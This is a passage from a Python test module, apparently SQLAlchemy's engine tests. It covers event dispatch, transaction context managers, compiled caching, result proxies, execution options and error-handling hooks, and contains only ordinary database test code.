        is_(eng.pool, eng2.pool)

    @testing.requires.ad_hoc_engines
    def test_generative_engine_event_dispatch(self):
        canary = []
        def l1(*arg, **kw):
            canary.append("l1")
        def l2(*arg, **kw):
            canary.append("l2")
        def l3(*arg, **kw):
            canary.append("l3")

        eng = engines.testing_engine(options={'execution_options':
                                            {'base': 'x1'}})
        event.listen(eng, "before_execute", l1)

        eng1 = eng.execution_options(foo="b1")
        event.listen(eng, "before_execute", l2)
        event.listen(eng1, "before_execute", l3)

        eng.execute(select([1])).close()
        eng1.execute(select([1])).close()

        eq_(canary, ["l1", "l2", "l3", "l1", "l2"])

    @testing.requires.ad_hoc_engines
    def test_generative_engine_event_dispatch_hasevents(self):
        def l1(*arg, **kw):
            pass
        eng = create_engine(testing.db.url)
        assert not eng._has_events
        event.listen(eng, "before_execute", l1)
        eng2 = eng.execution_options(foo='bar')
        assert eng2._has_events

    def test_unicode_test_fails_warning(self):
        class MockCursor(engines.DBAPIProxyCursor):
            def execute(self, stmt, params=None, **kw):
                if "test unicode returns" in stmt:
                    raise self.engine.dialect.dbapi.DatabaseError("boom")
                else:
                    return super(MockCursor, self).execute(stmt, params, **kw)
        eng = engines.proxying_engine(cursor_cls=MockCursor)
        assert_raises_message(
            tsa.exc.SAWarning,
            "Exception attempting to detect unicode returns",
            eng.connect
        )
        assert eng.dialect.returns_unicode_strings in (True, False)
        eng.dispose()

    def test_works_after_dispose(self):
        eng = create_engine(testing.db.url)
        for i in range(3):
            eq_(eng.scalar(select([1])), 1)
            eng.dispose()

    def test_works_after_dispose_testing_engine(self):
        eng = engines.testing_engine()
        for i in range(3):
            eq_(eng.scalar(select([1])), 1)
            eng.dispose()

class ConvenienceExecuteTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        cls.table = Table('exec_test', metadata,
            Column('a', Integer),
            Column('b', Integer),
            test_needs_acid=True
        )

    def _trans_fn(self, is_transaction=False):
        def go(conn, x, value=None):
            if is_transaction:
                conn = conn.connection
            conn.execute(self.table.insert().values(a=x, b=value))
        return go

    def _trans_rollback_fn(self, is_transaction=False):
        def go(conn, x, value=None):
            if is_transaction:
                conn = conn.connection
            conn.execute(self.table.insert().values(a=x, b=value))
            raise Exception("breakage")
        return go

    def _assert_no_data(self):
        eq_(
            testing.db.scalar(self.table.count()), 0
        )

    def _assert_fn(self, x, value=None):
        eq_(
            testing.db.execute(self.table.select()).fetchall(),
            [(x, value)]
        )

    def test_transaction_engine_ctx_commit(self):
        fn = self._trans_fn()
        ctx = testing.db.begin()
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_engine_ctx_begin_fails(self):
        engine = engines.testing_engine()

        mock_connection = Mock(
            return_value=Mock(
                        begin=Mock(side_effect=Exception("boom"))
                    )
        )
        engine._connection_cls = mock_connection
        assert_raises(
            Exception,
            engine.begin
        )

        eq_(
            mock_connection.return_value.close.mock_calls,
            [call()]
        )

    def test_transaction_engine_ctx_rollback(self):
        fn = self._trans_rollback_fn()
        ctx = testing.db.begin()
        assert_raises_message(
            Exception,
            "breakage",
            testing.run_as_contextmanager, ctx, fn, 5, value=8
        )
        self._assert_no_data()

    def test_transaction_tlocal_engine_ctx_commit(self):
        fn = self._trans_fn()
        engine = engines.testing_engine(options=dict(
                                strategy='threadlocal',
                                pool=testing.db.pool))
        ctx = engine.begin()
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_tlocal_engine_ctx_rollback(self):
        fn = self._trans_rollback_fn()
        engine = engines.testing_engine(options=dict(
                                strategy='threadlocal',
                                pool=testing.db.pool))
        ctx = engine.begin()
        assert_raises_message(
            Exception,
            "breakage",
            testing.run_as_contextmanager, ctx, fn, 5, value=8
        )
        self._assert_no_data()

    def test_transaction_connection_ctx_commit(self):
        fn = self._trans_fn(True)
        conn = testing.db.connect()
        ctx = conn.begin()
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_connection_ctx_rollback(self):
        fn = self._trans_rollback_fn(True)
        conn = testing.db.connect()
        ctx = conn.begin()
        assert_raises_message(
            Exception,
            "breakage",
            testing.run_as_contextmanager, ctx, fn, 5, value=8
        )
        self._assert_no_data()

    def test_connection_as_ctx(self):
        fn = self._trans_fn()
        ctx = testing.db.connect()
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        # autocommit is on
        self._assert_fn(5, value=8)

    @testing.fails_on('mysql+oursql', "oursql bug ?  getting wrong rowcount")
    def test_connect_as_ctx_noautocommit(self):
        fn = self._trans_fn()
        self._assert_no_data()
        ctx = testing.db.connect().execution_options(autocommit=False)
        testing.run_as_contextmanager(ctx, fn, 5, value=8)
        # autocommit is off
        self._assert_no_data()

    def test_transaction_engine_fn_commit(self):
        fn = self._trans_fn()
        testing.db.transaction(fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_engine_fn_rollback(self):
        fn = self._trans_rollback_fn()
        assert_raises_message(
            Exception,
            "breakage",
            testing.db.transaction, fn, 5, value=8
        )
        self._assert_no_data()

    def test_transaction_connection_fn_commit(self):
        fn = self._trans_fn()
        conn = testing.db.connect()
        conn.transaction(fn, 5, value=8)
        self._assert_fn(5, value=8)

    def test_transaction_connection_fn_rollback(self):
        fn = self._trans_rollback_fn()
        conn = testing.db.connect()
        assert_raises(
            Exception,
            conn.transaction, fn, 5, value=8
        )
        self._assert_no_data()

class CompiledCacheTest(fixtures.TestBase):
    __backend__ = True

    @classmethod
    def setup_class(cls):
        global users, metadata
        metadata = MetaData(testing.db)
        users = Table('users', metadata,
            Column('user_id', INT, primary_key=True,
                            test_needs_autoincrement=True),
            Column('user_name', VARCHAR(20)),
        )
        metadata.create_all()

    @engines.close_first
    def teardown(self):
        testing.db.execute(users.delete())

    @classmethod
    def teardown_class(cls):
        metadata.drop_all()

    def test_cache(self):
        conn = testing.db.connect()
        cache = {}
        cached_conn = conn.execution_options(compiled_cache=cache)

        ins = users.insert()
        cached_conn.execute(ins, {'user_name':'u1'})
        cached_conn.execute(ins, {'user_name':'u2'})
        cached_conn.execute(ins, {'user_name':'u3'})
        assert len(cache) == 1
        eq_(conn.execute("select count(*) from users").scalar(), 3)


class MockStrategyTest(fixtures.TestBase):
    def _engine_fixture(self):
        buf = util.StringIO()
        def dump(sql, *multiparams, **params):
            buf.write(util.text_type(sql.compile(dialect=engine.dialect)))
        engine = create_engine('postgresql://', strategy='mock', executor=dump)
        return engine, buf

    def test_sequence_not_duped(self):
        engine, buf = self._engine_fixture()
        metadata = MetaData()
        t = Table('testtable', metadata,
           Column('pk', Integer, Sequence('testtable_pk_seq'), primary_key=True)
        )

        t.create(engine)
        t.drop(engine)

        eq_(
            re.findall(r'CREATE (\w+)', buf.getvalue()),
            ["SEQUENCE", "TABLE"]
        )

        eq_(
            re.findall(r'DROP (\w+)', buf.getvalue()),
            ["SEQUENCE", "TABLE"]
        )

class ResultProxyTest(fixtures.TestBase):
    __backend__ = True

    def test_nontuple_row(self):
        """ensure the C version of BaseRowProxy handles
        duck-type-dependent rows."""

        from sqlalchemy.engine import RowProxy

        class MyList(object):
            def __init__(self, l):
                self.l = l

            def __len__(self):
                return len(self.l)

            def __getitem__(self, i):
                return list.__getitem__(self.l, i)

        proxy = RowProxy(object(), MyList(['value']), [None], {'key'
                         : (None, None, 0), 0: (None, None, 0)})
        eq_(list(proxy), ['value'])
        eq_(proxy[0], 'value')
        eq_(proxy['key'], 'value')

    @testing.provide_metadata
    def test_no_rowcount_on_selects_inserts(self):
        """assert that rowcount is only called on deletes and updates.

        This because cursor.rowcount may can be expensive on some dialects
        such as Firebird, however many dialects require it be called
        before the cursor is closed.

        """

        metadata = self.metadata

        engine = engines.testing_engine()

        t = Table('t1', metadata,
            Column('data', String(10))
        )
        metadata.create_all(engine)

        with patch.object(engine.dialect.execution_ctx_cls, "rowcount") as mock_rowcount:
            mock_rowcount.__get__ = Mock()
            engine.execute(t.insert(),
                                {'data': 'd1'},
                                {'data': 'd2'},
                                {'data': 'd3'})

            eq_(len(mock_rowcount.__get__.mock_calls), 0)

            eq_(
                    engine.execute(t.select()).fetchall(),
                    [('d1', ), ('d2', ), ('d3', )]
            )
            eq_(len(mock_rowcount.__get__.mock_calls), 0)

            engine.execute(t.update(), {'data': 'd4'})

            eq_(len(mock_rowcount.__get__.mock_calls), 1)

            engine.execute(t.delete())
            eq_(len(mock_rowcount.__get__.mock_calls), 2)


    def test_rowproxy_is_sequence(self):
        import collections
        from sqlalchemy.engine import RowProxy

        row = RowProxy(object(), ['value'], [None], {'key'
                         : (None, None, 0), 0: (None, None, 0)})
        assert isinstance(row, collections.Sequence)

    @testing.requires.cextensions
    def test_row_c_sequence_check(self):
        import csv
        import collections

        metadata = MetaData()
        metadata.bind = 'sqlite://'
        users = Table('users', metadata,
            Column('id', Integer, primary_key=True),
            Column('name', String(40)),
        )
        users.create()

        users.insert().execute(name='Test')
        row = users.select().execute().fetchone()

        s = util.StringIO()
        writer = csv.writer(s)
        # csv performs PySequenceCheck call
        writer.writerow(row)
        assert s.getvalue().strip() == '1,Test'

    @testing.requires.selectone
    def test_empty_accessors(self):
        statements = [
            (
                "select 1",
                [
                    lambda r: r.last_inserted_params(),
                    lambda r: r.last_updated_params(),
                    lambda r: r.prefetch_cols(),
                    lambda r: r.postfetch_cols(),
                    lambda r : r.inserted_primary_key
                ],
                "Statement is not a compiled expression construct."
            ),
            (
                select([1]),
                [
                    lambda r: r.last_inserted_params(),
                    lambda r : r.inserted_primary_key
                ],
                r"Statement is not an insert\(\) expression construct."
            ),
            (
                select([1]),
                [
                    lambda r: r.last_updated_params(),
                ],
                r"Statement is not an update\(\) expression construct."
            ),
            (
                select([1]),
                [
                    lambda r: r.prefetch_cols(),
                    lambda r : r.postfetch_cols()
                ],
                r"Statement is not an insert\(\) "
                r"or update\(\) expression construct."
            ),
        ]

        for stmt, meths, msg in statements:
            r = testing.db.execute(stmt)
            try:
                for meth in meths:
                    assert_raises_message(
                        tsa.exc.InvalidRequestError,
                        msg,
                        meth, r
                    )

            finally:
                r.close()

class ExecutionOptionsTest(fixtures.TestBase):
    def test_dialect_conn_options(self):
        engine = testing_engine("sqlite://", options=dict(_initialize=False))
        engine.dialect = Mock()
        conn = engine.connect()
        c2 = conn.execution_options(foo="bar")
        eq_(
            engine.dialect.set_connection_execution_options.mock_calls,
            [call(c2, {"foo": "bar"})]
        )

    def test_dialect_engine_options(self):
        engine = testing_engine("sqlite://")
        engine.dialect = Mock()
        e2 = engine.execution_options(foo="bar")
        eq_(
            engine.dialect.set_engine_execution_options.mock_calls,
            [call(e2, {"foo": "bar"})]
        )

    def test_dialect_engine_construction_options(self):
        dialect = Mock()
        engine = Engine(Mock(), dialect, Mock(),
                                execution_options={"foo": "bar"})
        eq_(
            dialect.set_engine_execution_options.mock_calls,
            [call(engine, {"foo": "bar"})]
        )

    def test_propagate_engine_to_connection(self):
        engine = testing_engine("sqlite://",
                        options=dict(execution_options={"foo": "bar"}))
        conn = engine.connect()
        eq_(conn._execution_options, {"foo": "bar"})

    def test_propagate_option_engine_to_connection(self):
        e1 = testing_engine("sqlite://",
                        options=dict(execution_options={"foo": "bar"}))
        e2 = e1.execution_options(bat="hoho")
        c1 = e1.connect()
        c2 = e2.connect()
        eq_(c1._execution_options, {"foo": "bar"})
        eq_(c2._execution_options, {"foo": "bar", "bat": "hoho"})





class AlternateResultProxyTest(fixtures.TestBase):
    __requires__ = ('sqlite', )

    @classmethod
    def setup_class(cls):
        from sqlalchemy.engine import base, default
        cls.engine = engine = testing_engine('sqlite://')
        m = MetaData()
        cls.table = t = Table('test', m,
            Column('x', Integer, primary_key=True),
            Column('y', String(50, convert_unicode='force'))
        )
        m.create_all(engine)
        engine.execute(t.insert(), [
            {'x':i, 'y':"t_%d" % i} for i in range(1, 12)
        ])

    def _test_proxy(self, cls):
        class ExcCtx(default.DefaultExecutionContext):
            def get_result_proxy(self):
                return cls(self)
        self.engine.dialect.execution_ctx_cls = ExcCtx
        rows = []
        r = self.engine.execute(select([self.table]))
        assert isinstance(r, cls)
        for i in range(5):
            rows.append(r.fetchone())
        eq_(rows, [(i, "t_%d" % i) for i in range(1, 6)])

        rows = r.fetchmany(3)
        eq_(rows, [(i, "t_%d" % i) for i in range(6, 9)])

        rows = r.fetchall()
        eq_(rows, [(i, "t_%d" % i) for i in range(9, 12)])

        r = self.engine.execute(select([self.table]))
        rows = r.fetchmany(None)
        eq_(rows[0], (1, "t_1"))
        # number of rows here could be one, or the whole thing
        assert len(rows) == 1 or len(rows) == 11

        r = self.engine.execute(select([self.table]).limit(1))
        r.fetchone()
        eq_(r.fetchone(), None)

        r = self.engine.execute(select([self.table]).limit(5))
        rows = r.fetchmany(6)
        eq_(rows, [(i, "t_%d" % i) for i in range(1, 6)])

    def test_plain(self):
        self._test_proxy(_result.ResultProxy)

    def test_buffered_row_result_proxy(self):
        self._test_proxy(_result.BufferedRowResultProxy)

    def test_fully_buffered_result_proxy(self):
        self._test_proxy(_result.FullyBufferedResultProxy)

    def test_buffered_column_result_proxy(self):
        self._test_proxy(_result.BufferedColumnResultProxy)

class EngineEventsTest(fixtures.TestBase):
    __requires__ = 'ad_hoc_engines',
    __backend__ = True

    def tearDown(self):
        Engine.dispatch._clear()
        Engine._has_events = False

    def _assert_stmts(self, expected, received):
        orig = list(received)
        for stmt, params, posn in expected:
            if not received:
                assert False, "Nothing available for stmt: %s" % stmt
            while received:
                teststmt, testparams, testmultiparams = \
                    received.pop(0)
                teststmt = re.compile(r'[\n\t ]+', re.M).sub(' ',
                        teststmt).strip()
                if teststmt.startswith(stmt) and (testparams
                        == params or testparams == posn):
                    break

    def test_per_engine_independence(self):
        e1 = testing_engine(config.db_url)
        e2 = testing_engine(config.db_url)

        canary = Mock()
        event.listen(e1, "before_execute", canary)
        s1 = select([1])
        s2 = select([2])
        e1.execute(s1)
        e2.execute(s2)
        eq_(
            [arg[1][1] for arg in canary.mock_calls], [s1]
        )
        event.listen(e2, "before_execute", canary)
        e1.execute(s1)
        e2.execute(s2)
        eq_([arg[1][1] for arg in canary.mock_calls], [s1, s1, s2])


    def test_per_engine_plus_global(self):
        canary = Mock()
        event.listen(Engine, "before_execute", canary.be1)
        e1 = testing_engine(config.db_url)
        e2 = testing_engine(config.db_url)

        event.listen(e1, "before_execute", canary.be2)

        event.listen(Engine, "before_execute", canary.be3)
        e1.connect()
        e2.connect()

        e1.execute(select([1]))
        eq_(canary.be1.call_count, 1)
        eq_(canary.be2.call_count, 1)

        e2.execute(select([1]))

        eq_(canary.be1.call_count, 2)
        eq_(canary.be2.call_count, 1)
        eq_(canary.be3.call_count, 2)

    def test_per_connection_plus_engine(self):
        canary = Mock()
        e1 = testing_engine(config.db_url)

        event.listen(e1, "before_execute", canary.be1)

        conn = e1.connect()
        event.listen(conn, "before_execute", canary.be2)
        conn.execute(select([1]))

        eq_(canary.be1.call_count, 1)
        eq_(canary.be2.call_count, 1)

        conn._branch().execute(select([1]))
        eq_(canary.be1.call_count, 2)
        eq_(canary.be2.call_count, 2)

    def test_add_event_after_connect(self):
        # new feature as of #2978
        canary = Mock()
        e1 = create_engine(config.db_url)
        assert not e1._has_events

        conn = e1.connect()

        event.listen(e1, "before_execute", canary.be1)
        conn.execute(select([1]))

        eq_(canary.be1.call_count, 1)

        conn._branch().execute(select([1]))
        eq_(canary.be1.call_count, 2)

    def test_force_conn_events_false(self):
        canary = Mock()
        e1 = create_engine(config.db_url)
        assert not e1._has_events

        event.listen(e1, "before_execute", canary.be1)

        conn = e1._connection_cls(e1, connection=e1.raw_connection(),
                            _has_events=False)

        conn.execute(select([1]))

        eq_(canary.be1.call_count, 0)

        conn._branch().execute(select([1]))
        eq_(canary.be1.call_count, 0)

    def test_cursor_events_ctx_execute_scalar(self):
        canary = Mock()
        e1 = testing_engine(config.db_url)

        event.listen(e1, "before_cursor_execute", canary.bce)
        event.listen(e1, "after_cursor_execute", canary.ace)

        stmt = str(select([1]).compile(dialect=e1.dialect))

        with e1.connect() as conn:
            dialect = conn.dialect

            ctx = dialect.execution_ctx_cls._init_statement(
                            dialect, conn, conn.connection, stmt, {})

            ctx._execute_scalar(stmt, Integer())

        eq_(canary.bce.mock_calls,
                [call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)])
        eq_(canary.ace.mock_calls,
                [call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)])

    def test_cursor_events_execute(self):
        canary = Mock()
        e1 = testing_engine(config.db_url)

        event.listen(e1, "before_cursor_execute", canary.bce)
        event.listen(e1, "after_cursor_execute", canary.ace)

        stmt = str(select([1]).compile(dialect=e1.dialect))

        with e1.connect() as conn:

            result = conn.execute(stmt)

        ctx = result.context
        eq_(canary.bce.mock_calls,
                [call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)])
        eq_(canary.ace.mock_calls,
                [call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)])


    def test_argument_format_execute(self):
        def before_execute(conn, clauseelement, multiparams, params):
            assert isinstance(multiparams, (list, tuple))
            assert isinstance(params, dict)
        def after_execute(conn, clauseelement, multiparams, params, result):
            assert isinstance(multiparams, (list, tuple))
            assert isinstance(params, dict)
        e1 = testing_engine(config.db_url)
        event.listen(e1, 'before_execute', before_execute)
        event.listen(e1, 'after_execute', after_execute)

        e1.execute(select([1]))
        e1.execute(select([1]).compile(dialect=e1.dialect).statement)
        e1.execute(select([1]).compile(dialect=e1.dialect))
        e1._execute_compiled(select([1]).compile(dialect=e1.dialect), (), {})




    @testing.fails_on('firebird', 'Data type unknown')
    def test_execute_events(self):

        stmts = []
        cursor_stmts = []

        def execute(conn, clauseelement, multiparams,
                                                    params ):
            stmts.append((str(clauseelement), params, multiparams))

        def cursor_execute(conn, cursor, statement, parameters,
                                context, executemany):
            cursor_stmts.append((str(statement), parameters, None))


        for engine in [
            engines.testing_engine(options=dict(implicit_returning=False)),
            engines.testing_engine(options=dict(implicit_returning=False,
                                   strategy='threadlocal')),
            engines.testing_engine(options=dict(implicit_returning=False)).\
                connect()
            ]:
            event.listen(engine, 'before_execute', execute)
            event.listen(engine, 'before_cursor_execute', cursor_execute)
            m = MetaData(engine)
            t1 = Table('t1', m,
                Column('c1', Integer, primary_key=True),
                Column('c2', String(50), default=func.lower('Foo'),
                                            primary_key=True)
            )
            m.create_all()
            try:
                t1.insert().execute(c1=5, c2='some data')
                t1.insert().execute(c1=6)
                eq_(engine.execute('select * from t1').fetchall(), [(5,
                    'some data'), (6, 'foo')])
            finally:
                m.drop_all()

            compiled = [('CREATE TABLE t1', {}, None),
                        ('INSERT INTO t1 (c1, c2)',
                                {'c2': 'some data', 'c1': 5}, None),
                        ('INSERT INTO t1 (c1, c2)',
                        {'c1': 6}, None),
                        ('select * from t1', {}, None),
                        ('DROP TABLE t1', {}, None)]

            # or engine.dialect.preexecute_pk_sequences:
            if not testing.against('oracle+zxjdbc'):
                cursor = [
                    ('CREATE TABLE t1', {}, ()),
                    ('INSERT INTO t1 (c1, c2)', {
                        'c2': 'some data', 'c1': 5},
                        (5, 'some data')),
                    ('SELECT lower', {'lower_2': 'Foo'},
                        ('Foo', )),
                    ('INSERT INTO t1 (c1, c2)',
                     {'c2': 'foo', 'c1': 6},
                     (6, 'foo')),
                    ('select * from t1', {}, ()),
                    ('DROP TABLE t1', {}, ()),
                    ]
            else:
                insert2_params = 6, 'Foo'
                if testing.against('oracle+zxjdbc'):
                    insert2_params += (ReturningParam(12), )
                cursor = [('CREATE TABLE t1', {}, ()),
                          ('INSERT INTO t1 (c1, c2)',
                            {'c2': 'some data', 'c1': 5}, (5, 'some data')),
                          ('INSERT INTO t1 (c1, c2)', {'c1': 6,
                          'lower_2': 'Foo'}, insert2_params),
                          ('select * from t1', {}, ()),
                          ('DROP TABLE t1', {}, ())]
                                # bind param name 'lower_2' might
                                # be incorrect
            self._assert_stmts(compiled, stmts)
            self._assert_stmts(cursor, cursor_stmts)

    def test_options(self):
        canary = []

        def execute(conn, *args, **kw):
            canary.append('execute')

        def cursor_execute(conn, *args, **kw):
            canary.append('cursor_execute')

        engine = engines.testing_engine()
        event.listen(engine, 'before_execute', execute)
        event.listen(engine, 'before_cursor_execute', cursor_execute)
        conn = engine.connect()
        c2 = conn.execution_options(foo='bar')
        eq_(c2._execution_options, {'foo':'bar'})
        c2.execute(select([1]))
        c3 = c2.execution_options(bar='bat')
        eq_(c3._execution_options, {'foo':'bar', 'bar':'bat'})
        eq_(canary, ['execute', 'cursor_execute'])

    def test_retval_flag(self):
        canary = []
        def tracker(name):
            def go(conn, *args, **kw):
                canary.append(name)
            return go

        def execute(conn, clauseelement, multiparams, params):
            canary.append('execute')
            return clauseelement, multiparams, params

        def cursor_execute(conn, cursor, statement,
                        parameters, context, executemany):
            canary.append('cursor_execute')
            return statement, parameters

        engine = engines.testing_engine()

        assert_raises(
            tsa.exc.ArgumentError,
            event.listen, engine, "begin", tracker("begin"), retval=True
        )

        event.listen(engine, "before_execute", execute, retval=True)
        event.listen(engine, "before_cursor_execute", cursor_execute, retval=True)
        engine.execute(select([1]))
        eq_(
            canary, ['execute', 'cursor_execute']
        )

    def test_engine_connect(self):
        engine = engines.testing_engine()

        tracker = Mock()
        event.listen(engine, "engine_connect", tracker)

        c1 = engine.connect()
        c2 = c1._branch()
        c1.close()
        eq_(
            tracker.mock_calls,
            [call(c1, False), call(c2, True)]
        )

    def test_execution_options(self):
        engine = engines.testing_engine()

        engine_tracker = Mock()
        conn_tracker = Mock()

        event.listen(engine, "set_engine_execution_options", engine_tracker)
        event.listen(engine, "set_connection_execution_options", conn_tracker)

        e2 = engine.execution_options(e1='opt_e1')
        c1 = engine.connect()
        c2 = c1.execution_options(c1='opt_c1')
        c3 = e2.connect()
        c4 = c3.execution_options(c3='opt_c3')
        eq_(
            engine_tracker.mock_calls,
            [call(e2, {'e1': 'opt_e1'})]
        )
        eq_(
            conn_tracker.mock_calls,
            [call(c2, {"c1": "opt_c1"}), call(c4, {"c3": "opt_c3"})]
        )


    @testing.requires.sequences
    @testing.provide_metadata
    def test_cursor_execute(self):
        canary = []
        def tracker(name):
            def go(conn, cursor, statement, parameters, context, executemany):
                canary.append((statement, context))
            return go
        engine = engines.testing_engine()


        t = Table('t', self.metadata,
                    Column('x', Integer, Sequence('t_id_seq'), primary_key=True),
                    implicit_returning=False
                    )
        self.metadata.create_all(engine)
        with engine.begin() as conn:
            event.listen(conn, 'before_cursor_execute', tracker('cursor_execute'))
            conn.execute(t.insert())
        # we see the sequence pre-executed in the first call
        assert "t_id_seq" in canary[0][0]
        assert "INSERT" in canary[1][0]
        # same context
        is_(
            canary[0][1], canary[1][1]
        )

    def test_transactional(self):
        canary = []
        def tracker(name):
            def go(conn, *args, **kw):
                canary.append(name)
            return go

        engine = engines.testing_engine()
        event.listen(engine, 'before_execute', tracker('execute'))
        event.listen(engine, 'before_cursor_execute', tracker('cursor_execute'))
        event.listen(engine, 'begin', tracker('begin'))
        event.listen(engine, 'commit', tracker('commit'))
        event.listen(engine, 'rollback', tracker('rollback'))

        conn = engine.connect()
        trans = conn.begin()
        conn.execute(select([1]))
        trans.rollback()
        trans = conn.begin()
        conn.execute(select([1]))
        trans.commit()

        eq_(canary, [
            'begin', 'execute', 'cursor_execute', 'rollback',
            'begin', 'execute', 'cursor_execute', 'commit',
            ])

    @testing.requires.savepoints
    @testing.requires.two_phase_transactions
    def test_transactional_advanced(self):
        canary1 = []
        def tracker1(name):
            def go(*args, **kw):
                canary1.append(name)
            return go
        canary2 = []
        def tracker2(name):
            def go(*args, **kw):
                canary2.append(name)
            return go

        engine = engines.testing_engine()
        for name in ['begin', 'savepoint',
                    'rollback_savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']:
            event.listen(engine, '%s' % name, tracker1(name))

        conn = engine.connect()
        for name in ['begin', 'savepoint',
                    'rollback_savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']:
            event.listen(conn, '%s' % name, tracker2(name))

        trans = conn.begin()
        trans2 = conn.begin_nested()
        conn.execute(select([1]))
        trans2.rollback()
        trans2 = conn.begin_nested()
        conn.execute(select([1]))
        trans2.commit()
        trans.rollback()

        trans = conn.begin_twophase()
        conn.execute(select([1]))
        trans.prepare()
        trans.commit()

        eq_(canary1, ['begin', 'savepoint',
                    'rollback_savepoint', 'savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']
        )
        eq_(canary2, ['begin', 'savepoint',
                    'rollback_savepoint', 'savepoint', 'release_savepoint',
                    'rollback', 'begin_twophase',
                       'prepare_twophase', 'commit_twophase']
        )

class HandleErrorTest(fixtures.TestBase):
    __requires__ = 'ad_hoc_engines',
    __backend__ = True

    def tearDown(self):
        Engine.dispatch._clear()
        Engine._has_events = False

    def test_legacy_dbapi_error(self):
        engine = engines.testing_engine()
        canary = Mock()

        event.listen(engine, "dbapi_error", canary)

        with engine.connect() as conn:
            try:
                conn.execute("SELECT FOO FROM I_DONT_EXIST")
                assert False
            except tsa.exc.DBAPIError as e:
                eq_(canary.mock_calls[0][1][5], e.orig)
                eq_(canary.mock_calls[0][1][2], "SELECT FOO FROM I_DONT_EXIST")

    def test_legacy_dbapi_error_no_ad_hoc_context(self):
        engine = engines.testing_engine()

        listener = Mock(return_value=None)
        event.listen(engine, 'dbapi_error', listener)

        nope = Exception("nope")
        class MyType(TypeDecorator):
            impl = Integer
            def process_bind_param(self, value, dialect):
                raise nope

        with engine.connect() as conn:
            assert_raises_message(
                tsa.exc.StatementError,
                r"nope \(original cause: Exception: nope\) u?'SELECT 1 ",
                conn.execute,
                    select([1]).where(
                            column('foo') == literal('bar', MyType()))
            )
        # no legacy event
        eq_(listener.mock_calls, [])

    def test_legacy_dbapi_error_non_dbapi_error(self):
        engine = engines.testing_engine()

        listener = Mock(return_value=None)
        event.listen(engine, 'dbapi_error', listener)

        nope = TypeError("I'm not a DBAPI error")
        with engine.connect() as c:
            c.connection.cursor = Mock(
                    return_value=Mock(
                        execute=Mock(
                                side_effect=nope
                        ))
                    )

            assert_raises_message(
                TypeError,
                "I'm not a DBAPI error",
                c.execute, "select "
            )
        # no legacy event
        eq_(listener.mock_calls, [])


    def test_handle_error(self):
        engine = engines.testing_engine()
        canary = Mock(return_value=None)

        event.listen(engine, "handle_error", canary)

        with engine.connect() as conn:
            try:
                conn.execute("SELECT FOO FROM I_DONT_EXIST")
                assert False
            except tsa.exc.DBAPIError as e:
                ctx = canary.mock_calls[0][1][0]

                eq_(ctx.original_exception, e.orig)
                is_(ctx.sqlalchemy_exception, e)
                eq_(ctx.statement, "SELECT FOO FROM I_DONT_EXIST")

    def test_exception_event_reraise(self):
        engine = engines.testing_engine()

        class MyException(Exception):
            pass

        @event.listens_for(engine, 'handle_error', retval=True)
        def err(context):
            stmt = context.statement
            exception = context.original_exception
            if "ERROR ONE" in str(stmt):
                return MyException("my exception")
            elif "ERROR TWO" in str(stmt):
                return exception
            else:
                return None

        conn = engine.connect()
        # case 1: custom exception
        assert_raises_message(
            MyException,
            "my exception",
            conn.execute, "SELECT 'ERROR ONE' FROM I_DONT_EXIST"
        )
        # case 2: return the DBAPI exception we're given;
        # no wrapping should occur
        assert_raises(
            conn.dialect.dbapi.Error,
            conn.execute, "SELECT 'ERROR TWO' FROM I_DONT_EXIST"
        )
        # case 3: normal wrapping
        assert_raises(
            tsa.exc.DBAPIError,
            conn.execute, "SELECT 'ERROR THREE' FROM I_DONT_EXIST"
        )

    def test_exception_event_reraise_chaining(self):
        engine = engines.testing_engine()

        class MyException1(Exception):
            pass

        class MyException2(Exception):
            pass

        class MyException3(Exception):
            pass

        @event.listens_for(engine, 'handle_error', retval=True)
        def err1(context):
            stmt = context.statement

            if "ERROR ONE" in str(stmt) or "ERROR TWO" in str(stmt) \
                    or "ERROR THREE" in str(stmt):
                return MyException1("my exception")
            elif "ERROR FOUR" in str(stmt):
                raise MyException3("my exception short circuit")

        @event.listens_for(engine, 'handle_error', retval=True)
        def err2(context):
            stmt = context.statement
            if ("ERROR ONE" in str(stmt) or "ERROR FOUR" in str(stmt)) \
                    and isinstance(context.chained_exception, MyException1):
                raise MyException2("my exception chained")
            elif "ERROR TWO" in str(stmt):
                return context.chained_exception
            else:
                return None

        conn = engine.connect()

        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            assert_raises_message(
                MyException2,
                "my exception chained",
                conn.execute, "SELECT 'ERROR ONE' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)

        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            assert_raises(
                MyException1,
                conn.execute, "SELECT 'ERROR TWO' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)

        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            # test that non None from err1 isn't cancelled out
            # by err2
            assert_raises(
                MyException1,
                conn.execute, "SELECT 'ERROR THREE' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)

        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            assert_raises(
                tsa.exc.DBAPIError,
                conn.execute, "SELECT 'ERROR FIVE' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)

        with patch.object(engine.
                dialect.execution_ctx_cls,
                "handle_dbapi_exception") as patched:
            assert_raises_message(
                MyException3,
                "my exception short circuit",
                conn.execute, "SELECT 'ERROR FOUR' FROM I_DONT_EXIST"
            )
            eq_(patched.call_count, 1)
